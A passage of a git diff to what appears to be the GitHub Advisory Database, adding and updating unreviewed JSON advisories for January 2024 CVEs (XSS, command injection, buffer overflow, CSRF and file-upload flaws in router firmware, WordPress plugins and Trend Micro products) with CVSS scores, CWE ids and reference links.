 "details": "Certain dashboard widgets on Trend Micro Apex Central (on-premise) are vulnerable to cross-site scripting (XSS) attacks that may allow an attacker to achieve remote code execution on affected servers.\n\nPlease note this vulnerability is similar, but not identical to CVE-2023-52327.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ }
 ],
 "affected": [
 
@@ -29,9 +32,9 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-79"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-23T21:15:09Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-r8vw-x62m-xcj4/GHSA-r8vw-x62m-xcj4.json b/advisories/unreviewed/2024/01/GHSA-r8vw-x62m-xcj4/GHSA-r8vw-x62m-xcj4.json
new file mode 100644
index 0000000000000..627d4b37407a2
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-r8vw-x62m-xcj4/GHSA-r8vw-x62m-xcj4.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-r8vw-x62m-xcj4",
+ "modified": "2024-02-05T21:30:31Z",
+ "published": "2024-01-31T18:31:26Z",
+ "aliases": [
+ "CVE-2024-23508"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in bPlugins PDF Poster – PDF Embedder Plugin for WordPress allows Reflected XSS.This issue affects PDF Poster – PDF Embedder Plugin for WordPress: from n/a through 2.1.17.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23508"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/pdf-poster/wordpress-pdf-poster-plugin-2-1-17-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-31T16:15:47Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-r9gf-434r-vm83/GHSA-r9gf-434r-vm83.json b/advisories/unreviewed/2024/01/GHSA-r9gf-434r-vm83/GHSA-r9gf-434r-vm83.json
new file mode 100644
index 0000000000000..eaea96189d8ce
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-r9gf-434r-vm83/GHSA-r9gf-434r-vm83.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-r9gf-434r-vm83",
+ "modified": "2024-02-01T06:31:05Z",
+ "published": "2024-01-30T15:30:22Z",
+ "aliases": [
+ "CVE-2024-24326"
+ ],
+ "details": "TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the arpEnable parameter in the setStaticDhcpRules function.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24326"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/8/TOTOlink%20A3300R%20setStaticDhcpRules.md"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-78"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-30T15:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-rc4g-22pj-c822/GHSA-rc4g-22pj-c822.json b/advisories/unreviewed/2024/01/GHSA-rc4g-22pj-c822/GHSA-rc4g-22pj-c822.json
new file mode 100644
index 0000000000000..9cccb653642a3
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-rc4g-22pj-c822/GHSA-rc4g-22pj-c822.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-rc4g-22pj-c822",
+ "modified": "2024-02-03T00:31:33Z",
+ "published": "2024-01-29T21:30:27Z",
+ "aliases": [
+ "CVE-2024-22570"
+ ],
+ "details": "A stored cross-site scripting (XSS) vulnerability in /install.php?m=install&c=index&a=step3 of GreenCMS v2.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22570"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/Num-Nine/CVE/issues/11"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-29T20:15:15Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-rcj8-jx65-7c4r/GHSA-rcj8-jx65-7c4r.json b/advisories/unreviewed/2024/01/GHSA-rcj8-jx65-7c4r/GHSA-rcj8-jx65-7c4r.json
index 38a1e52e636b0..1f764669a663e 100644
--- a/advisories/unreviewed/2024/01/GHSA-rcj8-jx65-7c4r/GHSA-rcj8-jx65-7c4r.json
+++ b/advisories/unreviewed/2024/01/GHSA-rcj8-jx65-7c4r/GHSA-rcj8-jx65-7c4r.json
@@ -44,6 +44,10 @@
 {
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EJBMCWQ54R6ZL3MYU2D2JBW6JMZL7BQW/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-30"
 }
 ],
 "database_specific": {
diff --git a/advisories/unreviewed/2024/01/GHSA-rcv3-6pgv-6p72/GHSA-rcv3-6pgv-6p72.json b/advisories/unreviewed/2024/01/GHSA-rcv3-6pgv-6p72/GHSA-rcv3-6pgv-6p72.json
index a2d967caafaf7..af8e8b5ce6578 100644
--- a/advisories/unreviewed/2024/01/GHSA-rcv3-6pgv-6p72/GHSA-rcv3-6pgv-6p72.json
+++ b/advisories/unreviewed/2024/01/GHSA-rcv3-6pgv-6p72/GHSA-rcv3-6pgv-6p72.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-rcv3-6pgv-6p72",
- "modified": "2024-01-23T21:30:21Z",
+ "modified": "2024-01-29T21:30:27Z",
 "published": "2024-01-23T21:30:21Z",
 "aliases": [
 "CVE-2023-47202"
 ],
 "details": "A local file inclusion vulnerability on the Trend Micro Apex One management server could allow a local attacker to escalate privileges on affected installations.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
 
@@ -31,7 +34,7 @@
 "cwe_ids": [
 
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-23T21:15:08Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-rf89-gmj8-r696/GHSA-rf89-gmj8-r696.json b/advisories/unreviewed/2024/01/GHSA-rf89-gmj8-r696/GHSA-rf89-gmj8-r696.json
index a2d410b84d79a..783f89ade98f0 100644
--- a/advisories/unreviewed/2024/01/GHSA-rf89-gmj8-r696/GHSA-rf89-gmj8-r696.json
+++ b/advisories/unreviewed/2024/01/GHSA-rf89-gmj8-r696/GHSA-rf89-gmj8-r696.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-rf89-gmj8-r696",
- "modified": "2024-01-23T21:30:20Z",
+ "modified": "2024-01-30T18:30:19Z",
 "published": "2024-01-23T21:30:20Z",
 "aliases": [
 "CVE-2023-47197"
 ],
 "details": "An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThis vulnerability is similar to, but not identical to, CVE-2023-47198.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
 
@@ -29,9 +32,9 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-346"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-23T21:15:08Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-rm8m-jx8f-gg9f/GHSA-rm8m-jx8f-gg9f.json b/advisories/unreviewed/2024/01/GHSA-rm8m-jx8f-gg9f/GHSA-rm8m-jx8f-gg9f.json
new file mode 100644
index 0000000000000..b380e7f5af36c
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-rm8m-jx8f-gg9f/GHSA-rm8m-jx8f-gg9f.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-rm8m-jx8f-gg9f",
+ "modified": "2024-02-03T00:31:33Z",
+ "published": "2024-01-29T15:30:30Z",
+ "aliases": [
+ "CVE-2023-7074"
+ ],
+ "details": "The WP SOCIAL BOOKMARK MENU WordPress plugin through 1.2 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-7074"
+ },
+ {
+ "type": "WEB",
+ "url": "https://magos-securitas.com/txt/CVE-2023-7074.txt"
+ },
+ {
+ "type": "WEB",
+ "url": "https://wpscan.com/vulnerability/7906c349-97b0-4d82-aef0-97a1175ae88e/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-352"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-29T15:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-rpp9-fjv3-6cxw/GHSA-rpp9-fjv3-6cxw.json b/advisories/unreviewed/2024/01/GHSA-rpp9-fjv3-6cxw/GHSA-rpp9-fjv3-6cxw.json
new file mode 100644
index 0000000000000..9af91f70e6abb
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-rpp9-fjv3-6cxw/GHSA-rpp9-fjv3-6cxw.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-rpp9-fjv3-6cxw",
+ "modified": "2024-01-29T18:31:49Z",
+ "published": "2024-01-29T18:31:49Z",
+ "aliases": [
+ "CVE-2024-1008"
+ ],
+ "details": "A vulnerability was found in SourceCodester Employee Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file edit-photo.php of the component Profile Page. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252277 was assigned to this vulnerability.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1008"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252277"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252277"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.youtube.com/watch?v=z4gcLZCOcnc"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-434"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-29T16:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-rq2f-mxxc-3hv5/GHSA-rq2f-mxxc-3hv5.json b/advisories/unreviewed/2024/01/GHSA-rq2f-mxxc-3hv5/GHSA-rq2f-mxxc-3hv5.json
new file mode 100644
index 0000000000000..080556b9f7528
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-rq2f-mxxc-3hv5/GHSA-rq2f-mxxc-3hv5.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-rq2f-mxxc-3hv5",
+ "modified": "2024-02-05T18:31:36Z",
+ "published": "2024-01-30T03:30:30Z",
+ "aliases": [
+ "CVE-2023-37571"
+ ],
+ "details": "Softing TH SCOPE through 3.70 allows XSS.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37571"
+ },
+ {
+ "type": "WEB",
+ "url": "https://industrial.softing.com"
+ },
+ {
+ "type": "WEB",
+ "url": "https://industrial.softing.com/fileadmin/psirt/downloads/2024/syt-2024-1.html"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-30T01:15:58Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-rr4v-xrwq-7rhx/GHSA-rr4v-xrwq-7rhx.json b/advisories/unreviewed/2024/01/GHSA-rr4v-xrwq-7rhx/GHSA-rr4v-xrwq-7rhx.json
index 6a176a83a09f9..7912ebd021885 100644
--- a/advisories/unreviewed/2024/01/GHSA-rr4v-xrwq-7rhx/GHSA-rr4v-xrwq-7rhx.json
+++ b/advisories/unreviewed/2024/01/GHSA-rr4v-xrwq-7rhx/GHSA-rr4v-xrwq-7rhx.json
@@ -45,6 +45,14 @@
 "type": "WEB",
 "url": "https://dfir.ru/2024/01/15/cve-2023-4001-a-vulnerability-in-the-downstream-grub-boot-manager/"
 },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3OBADMKHQLJOBA32Q7XPNSYMVHVAFDCB/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CHLZQ47HM64NDOHMHYO7VIJFYD5ZPPYN/"
+ },
 {
 "type": "WEB",
 "url": "http://www.openwall.com/lists/oss-security/2024/01/15/3"
diff --git a/advisories/unreviewed/2024/01/GHSA-rrr4-rqcr-8jmq/GHSA-rrr4-rqcr-8jmq.json b/advisories/unreviewed/2024/01/GHSA-rrr4-rqcr-8jmq/GHSA-rrr4-rqcr-8jmq.json
new file mode 100644
index 0000000000000..d33b478e78e95
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-rrr4-rqcr-8jmq/GHSA-rrr4-rqcr-8jmq.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-rrr4-rqcr-8jmq",
+ "modified": "2024-01-29T18:31:53Z",
+ "published": "2024-01-29T18:31:53Z",
+ "aliases": [
+ "CVE-2024-0788"
+ ],
+ "details": "SUPERAntiSpyware Pro X v10.0.1260 is vulnerable to kernel-level API parameters manipulation and Denial of Service vulnerabilities by triggering the 0x9C402140 IOCTL code of the saskutil64.sys driver.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0788"
+ },
+ {
+ "type": "WEB",
+ "url": "https://fluidattacks.com/advisories/brubeck/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.superantispyware.com/professional-x-edition.html"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-20"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-29T17:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-rvwq-r5pc-g3h9/GHSA-rvwq-r5pc-g3h9.json b/advisories/unreviewed/2024/01/GHSA-rvwq-r5pc-g3h9/GHSA-rvwq-r5pc-g3h9.json
index 0709db767bfc9..016c78f173235 100644
--- a/advisories/unreviewed/2024/01/GHSA-rvwq-r5pc-g3h9/GHSA-rvwq-r5pc-g3h9.json
+++ b/advisories/unreviewed/2024/01/GHSA-rvwq-r5pc-g3h9/GHSA-rvwq-r5pc-g3h9.json
@@ -40,6 +40,10 @@
 {
 "type": "WEB",
 "url": "https://support.apple.com/en-us/HT213941"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2024/02/05/8"
 }
 ],
 "database_specific": {
diff --git a/advisories/unreviewed/2024/01/GHSA-rx6w-gc3r-2fh2/GHSA-rx6w-gc3r-2fh2.json b/advisories/unreviewed/2024/01/GHSA-rx6w-gc3r-2fh2/GHSA-rx6w-gc3r-2fh2.json
index b45f5cecf6c3c..8c48fadd744d1 100644
--- a/advisories/unreviewed/2024/01/GHSA-rx6w-gc3r-2fh2/GHSA-rx6w-gc3r-2fh2.json
+++ b/advisories/unreviewed/2024/01/GHSA-rx6w-gc3r-2fh2/GHSA-rx6w-gc3r-2fh2.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-rx6w-gc3r-2fh2",
- "modified": "2024-01-25T18:30:51Z",
+ "modified": "2024-01-31T21:31:03Z",
 "published": "2024-01-25T18:30:51Z",
 "aliases": [
 "CVE-2024-22529"
 ],
 "details": "TOTOLINK X2000R_V2 V2.0.0-B20230727.10434 has a command injection vulnerability in the sub_449040 (handle function of formUploadFile) of /bin/boa.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
 
@@ -25,9 +28,9 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-77"
 ],
- "severity": null,
+ "severity": "CRITICAL",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-25T16:15:08Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-rx79-jj4h-rr5g/GHSA-rx79-jj4h-rr5g.json b/advisories/unreviewed/2024/01/GHSA-rx79-jj4h-rr5g/GHSA-rx79-jj4h-rr5g.json
new file mode 100644
index 0000000000000..d65284da733b3
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-rx79-jj4h-rr5g/GHSA-rx79-jj4h-rr5g.json
@@ -0,0 +1,47 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-rx79-jj4h-rr5g",
+ "modified": "2024-01-29T03:30:18Z",
+ "published": "2024-01-29T03:30:18Z",
+ "aliases": [
+ "CVE-2024-0994"
+ ],
+ "details": "A vulnerability was found in Tenda W6 1.0.0.9(4122). It has been declared as critical. Affected by this vulnerability is the function formSetCfm of the file /goform/setcfm of the component httpd. The manipulation of the argument funcpara1 leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252259. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0994"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jylsec.notion.site/Tenda-W6-has-stack-buffer-overflow-vulnerability-in-formSetCfm-4fab28f92ca74f519245b606d8345821?pvs=4"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252259"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252259"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-121",
+ "CWE-787"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-29T02:15:07Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-v23q-xxwx-66fg/GHSA-v23q-xxwx-66fg.json b/advisories/unreviewed/2024/01/GHSA-v23q-xxwx-66fg/GHSA-v23q-xxwx-66fg.json
new file mode 100644
index 0000000000000..165021236b976
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-v23q-xxwx-66fg/GHSA-v23q-xxwx-66fg.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-v23q-xxwx-66fg",
+ "modified": "2024-01-30T15:30:22Z",
+ "published": "2024-01-30T15:30:22Z",
+ "aliases": [
+ "CVE-2024-1033"
+ ],
+ "details": "A vulnerability, which was classified as problematic, has been found in openBI up to 1.0.8. Affected by this issue is the function agent of the file /application/index/controller/Datament.php. The manipulation of the argument api leads to information disclosure. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252308.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1033"
+ },
+ {
+ "type": "WEB",
+ "url": "https://note.zhaoj.in/share/nD654ot6zRQZ"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252308"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252308"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-200"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-30T14:15:47Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-v334-55hv-wvc6/GHSA-v334-55hv-wvc6.json b/advisories/unreviewed/2024/01/GHSA-v334-55hv-wvc6/GHSA-v334-55hv-wvc6.json
new file mode 100644
index 0000000000000..523f83add0837
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-v334-55hv-wvc6/GHSA-v334-55hv-wvc6.json
@@ -0,0 +1,46 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-v334-55hv-wvc6",
+  "modified": "2024-01-30T09:30:34Z",
+  "published": "2024-01-30T09:30:34Z",
+  "aliases": [
+    "CVE-2023-6374"
+  ],
+  "details": "Authentication Bypass by Capture-replay vulnerability in Mitsubishi Electric Corporation MELSEC WS Series WS0-GETH00200 all serial numbers allows a remote unauthenticated attacker to bypass authentication by capture-replay attack and illegally login to the affected module. As a result, the remote attacker who has logged in illegally may be able to disclose or tamper with the programs and parameters in the modules.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"
+    }
+  ],
+  "affected": [
+
+  ],
+  "references": [
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6374"
+    },
+    {
+      "type": "WEB",
+      "url": "https://jvn.jp/vu/JVNVU99497477"
+    },
+    {
+      "type": "WEB",
+      "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-030-03"
+    },
+    {
+      "type": "WEB",
+      "url": "https://www.mitsubishielectric.com/en/psirt/vulnerability/pdf/2023-019_en.pdf"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-294"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": false,
+    "github_reviewed_at": null,
+    "nvd_published_at": "2024-01-30T09:15:47Z"
+  }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-v3pc-xh3w-h68j/GHSA-v3pc-xh3w-h68j.json b/advisories/unreviewed/2024/01/GHSA-v3pc-xh3w-h68j/GHSA-v3pc-xh3w-h68j.json
new file mode 100644
index 0000000000000..2555d82265178
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-v3pc-xh3w-h68j/GHSA-v3pc-xh3w-h68j.json
@@ -0,0 +1,38 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-v3pc-xh3w-h68j",
+  "modified": "2024-01-31T21:31:03Z",
+  "published": "2024-01-31T21:31:03Z",
+  "aliases": [
+    "CVE-2024-22150"
+  ],
+  "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PWR Plugins Portfolio & Image Gallery for WordPress | PowerFolio allows Stored XSS.This issue affects Portfolio & Image Gallery for WordPress | PowerFolio: from n/a through 3.1.\n\n",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
+    }
+  ],
+  "affected": [
+
+  ],
+  "references": [
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22150"
+    },
+    {
+      "type": "WEB",
+      "url": "https://patchstack.com/database/vulnerability/portfolio-elementor/wordpress-powerfolio-plugin-3-1-cross-site-scripting-xss-vulnerability?_s_id=cve"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-79"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": false,
+    "github_reviewed_at": null,
+    "nvd_published_at": "2024-01-31T19:15:09Z"
+  }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-v4r8-6m3f-gvv4/GHSA-v4r8-6m3f-gvv4.json b/advisories/unreviewed/2024/01/GHSA-v4r8-6m3f-gvv4/GHSA-v4r8-6m3f-gvv4.json
index 85eae2d046d90..ac68dc16587f2 100644
--- a/advisories/unreviewed/2024/01/GHSA-v4r8-6m3f-gvv4/GHSA-v4r8-6m3f-gvv4.json
+++ b/advisories/unreviewed/2024/01/GHSA-v4r8-6m3f-gvv4/GHSA-v4r8-6m3f-gvv4.json
@@ -1,7 +1,7 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-v4r8-6m3f-gvv4",
-  "modified": "2024-01-10T18:30:24Z",
+  "modified": "2024-01-30T15:30:20Z",
   "published": "2024-01-03T09:30:33Z",
   "aliases": [
     "CVE-2023-6747"
@@ -25,6 +25,14 @@
       "type": "WEB",
       "url": "https://fooplugins.com/foogallery-wordpress-gallery-plugin/pricing/"
     },
+    {
+      "type": "WEB",
+      "url": "https://plugins.trac.wordpress.org/browser/foogallery/tags/2.4.9/includes/class-gallery-advanced-settings.php?rev=3027668#L149"
+    },
+    {
+      "type": "WEB",
+      "url": "https://plugins.trac.wordpress.org/browser/foogallery/tags/2.4.9/includes/functions.php#L1609"
+    },
     {
       "type": "WEB",
       "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/dce8ac32-cab8-4e05-bf6f-cc348d0c9472?source=cve"
diff --git a/advisories/unreviewed/2024/01/GHSA-v576-wfmr-x3x7/GHSA-v576-wfmr-x3x7.json b/advisories/unreviewed/2024/01/GHSA-v576-wfmr-x3x7/GHSA-v576-wfmr-x3x7.json
index b620669b75534..0c40dbaf29fa2 100644
--- a/advisories/unreviewed/2024/01/GHSA-v576-wfmr-x3x7/GHSA-v576-wfmr-x3x7.json
+++ b/advisories/unreviewed/2024/01/GHSA-v576-wfmr-x3x7/GHSA-v576-wfmr-x3x7.json
@@ -1,14 +1,17 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-v576-wfmr-x3x7",
-  "modified": "2024-01-23T21:30:21Z",
+  "modified": "2024-01-30T21:30:28Z",
   "published": "2024-01-23T21:30:21Z",
   "aliases": [
     "CVE-2023-52324"
   ],
   "details": "An unrestricted file upload vulnerability in Trend Micro Apex Central could allow a remote attacker to create arbitrary files on affected installations.\n\nPlease note: although authentication is required to exploit this vulnerability, this vulnerability could be exploited when the attacker has any valid set of credentials. Also, this vulnerability could be potentially used in combination with another vulnerability to execute arbitrary code.",
   "severity": [
-
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+    }
   ],
   "affected": [
 
@@ -29,9 +32,9 @@
   ],
   "database_specific": {
     "cwe_ids": [
-
+      "CWE-434"
     ],
-    "severity": null,
+    "severity": "HIGH",
     "github_reviewed": false,
     "github_reviewed_at": null,
